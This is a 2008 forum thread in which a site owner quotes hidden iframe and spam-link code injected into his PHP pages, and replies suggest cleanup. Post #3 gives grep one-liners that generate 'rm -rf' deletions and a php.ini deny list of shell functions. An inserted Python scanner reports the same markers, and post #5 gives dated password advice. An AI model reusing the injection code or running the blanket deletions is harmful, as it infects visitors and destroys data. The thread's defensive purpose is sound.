some thing is injecting iframe in my php pages

Discussion in 'Security' started by agazerboy, Nov 30, 2008.

  1. #1
    There are so many mastermind guys here and I need help, please help.

    I am running a site. Today I was editing meta tags and some other information and
    I saw the following code had been added to the file. I checked all PHP files and this code was in almost every file.

    <iframe src="http://spl.kerrq.com/vonline/count.html" name="banner" marginheight="1" frameborder="No" align="bottom" width="1" height="1" atomicselection="false" application="no" style="visibility: hidden"></iframe><U style="DISPLAY: none"><a href=http://toyota-.darseo.co.cc/>Toyota</a></U><iframe src="http://spl.kerrq.com/vonline/count.html" name="banner" marginheight="1" frameborder="No" align="bottom" width="1" height="1" atomicselection="false" application="no" style="visibility: hidden"></iframe>

    I did some googling and found the following reasons for that:
    1 - third party scripts are outdated on hosting
    2 - third party scripts have security holes etc.
    3 - directory permissions are not set properly etc.

    Well, none of these cases apply to me because I coded all the site by myself.
    I have 5 years of PHP experience so the code is well written and directory
    permissions are all good. I checked all files on my local server and they are all
    fine. I mailed the hosting company and they said it's a script problem, not hosting.
    I am dying, please help. Google and other search engines can ban me
    because of that.

    I saw the following forum but I don't have shell access so I couldn't do that

    http://www.bwseo.com/seo_forum/showthread.php?p=1#post1

    Thanks in advance
     
    agazerboy, Nov 30, 2008 IP
  2. UseShots
    #2
    5 years of php experience is not a reason to think your code is 100% safe. Some WP and Joomla coders have much more experience, still they release security patches every once in a while.

    I'll add some other reasons:
    1. The whole server has been compromised (every site is affected)
    2. Your own computer is infected and some trojan has stolen your passwords.
     
    UseShots, Dec 1, 2008 IP
  3. thetruth
    #3
    Easy to prevent if you have a dedicated server or ssh access to your Unix host.
    You can make the hackers cry for mommy's milk, but they find none on your host.

    Follow these steps.

    Check your httpd access log for hacker entries.

    It's not usually a case of stolen passwords. The hacker doesn't use them
    for iframe injection. Ignore what you read elsewhere.
    Flaw in UNIX operating system and security of your server permits this hack.

    First scan site for unusual files in /tmp.
    You may find a perl or shell script that is no good.
    Rename, remove or disable it however you can.
    Chmod it to 400 and rename at minimum.

    Next scan for C99 or r57 files which may now be on your host:
    find /var/www/ -name '*.php' -type f -print0 | xargs -0 grep -l r57 | awk '{print "rm -rf " $1}'

    find /var/www/ -name '*.php' -type f -print0 | xargs -0 grep -l c99 | awk '{print "rm -rf " $1}'


    Note the above is not guaranteed to find the files, if named cleverly.
    If any found just remove them.

    Next secure php. Add the following to php.ini

    disable_functions = symlink,ini_restore,imap_body,imap_list,imap_open,mysql_list_dbs,popen,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,socket_strerror,readlink,symlink,link,pfsockopen,ini_alter,dl,openlog,syslog,pcntl_exec,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,fpassthru,getcwd,system,passthru,exec,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec
    and reboot server.


    Note the essential function to disable is the passthru.


    At this point you may need to change ftp passwords to site.
     
    thetruth, Dec 2, 2008 IP
  4. UseShots
    #4
    As far as I can read the commands, they don't check filenames at all. They just search for .php files in "/var/www" and print "rm -rf" command for the found files with "c99" or "r57" strings in them.

    Instead of "/var/www" you should specify your own site's root directory. And don't hurry to remove the found files. They may happen to contain legitimate inclusions of the character sequences (c99 or r57).
     
    UseShots, Dec 9, 2008 IP
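A defender-side scanner for the two things this thread describes, the hidden 1x1 iframe from post #1 and the c99/r57 shell names grepped for in post #3, written here as an added example (not code from any poster). It reports file and line rather than deleting anything, because, as post #4 notes, a bare string match produces false positives that a person has to review; the sample page and its EXAMPLE-INVALID URL are constructed.

```python
import os
import re

# Markers taken from the thread: the hidden 1x1 iframe of post #1 and the
# c99 / r57 shell names of post #3. Constructed regexes, not the forum's code.
# The iframe rule requires an <iframe> tag AND a hiding trait on the same line.
HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*(?:width="1"|height="1"|visibility:\s*hidden)[^>]*>', re.I)
SHELL_NAME = re.compile(r'c99|r57', re.I)   # same loose match as post #3's grep


def scan_content(text):
    """Return (line_no, rule, snippet) for each suspicious line in one file."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if HIDDEN_IFRAME.search(line):
            findings.append((no, "hidden-iframe", line.strip()[:80]))
        elif SHELL_NAME.search(line):
            # Only a token hit; a human confirms it (post #4's false-positive caveat).
            findings.append((no, "shell-marker", line.strip()[:80]))
    return findings


def scan_tree(root, exts=(".php", ".html", ".js")):
    """Walk a web root and return {path: findings}; reports only, never deletes."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_content(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample page: one injected hidden iframe plus a benign "r57" hit.
SAMPLE = """<?php include 'header.php'; ?>
<iframe src="http://EXAMPLE-INVALID/count.html" width="1" height="1" style="visibility: hidden"></iframe>
<!-- part r57 is a legitimate product code here, not a shell -->
<p>welcome</p>
"""

if __name__ == "__main__":
    for no, rule, snippet in scan_content(SAMPLE):
        print(f"line {no}: {rule}: {snippet}")
```

Run `scan_tree("/path/to/site/root")` against a copy of the site to get a per-file report to review before touching anything.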
  5. Voxelite
    #5
    When trying to figure out how you got hacked, it helps to go from the largest to the smallest possibility. First thing to do is to check with your host to make sure that the entire server didn't get hacked. Since this usually doesn't happen too often if you have a good, large host, you should be fine. However, ask anyway.

    Next step is to disable the blackhat hacker's access. Hackers access sites many ways, but some require more skill than others, and, as a result, most use what's called a web shell (I'll go over the other ways later). It's basically a php script (sometimes it may be .asp or .js though, so watch out) that the blackhat hacker uploads onto your site after exploiting a flaw in the script or directory permissions (RFI/LFI). SQL Injection can be used too, but that's a little different. Anyway, so the first thing to do is check all php, asp, js, and aspx scripts that you have on the site. Don't take any chances, go through every one. Sometimes there may be two or three, in different places.

    Ok, so now you've cleaned the web shell, or you haven't found one. Either way, we'll continue on to detecting other methods of access. After a web shell, things can get tricky. The blackhat hacker could've uploaded an LKM or bin rootkit (however, this is beyond the scope of most people, and requires server access in most cases), dumped and decrypted your passwords (usually via SQL Injection), or even just have the login details for your FTP server. It's most likely one of the last two. Therefore, you'll want to change your passwords for EVERYTHING. Also remember to try not to include common or dictionary words in your pass. Mine are usually in the form of some numbers followed by upper and lower case letters, and then symbols. Example: 123AppleBeagle@@#. You don't have to make it random unless you're encrypting something, as bruteforcing is impractical these days, and most password hash crackers will take years to get a password like the one above.

    Anyway, once you've confirmed that you checked all the scripts, and that the server is safe, and that you changed your passes for everything (FTP, cPanel, Wordpress, etc.), you can probably relax. If it happens again, just post back here, and we'll see what we can do to help you. Oh, just a side note here, I wouldn't make checking logs a top priority. Download them at first to make sure that you have them, then do the above, then look at the logs. Also remember that 95% of the time the blackhat hacker has used a proxy or VPN, and the chances of getting his real IP are next to none. Good luck!! :)
     
    Voxelite, Dec 11, 2008 IP
  6. UseShots
    #6
    Great post!

    While logs may not be very useful in terms of tracking the bad guys, they may provide enough information to locate the security hole if it was an SQL injection or some similar attack.
     
    UseShots, Dec 12, 2008 IP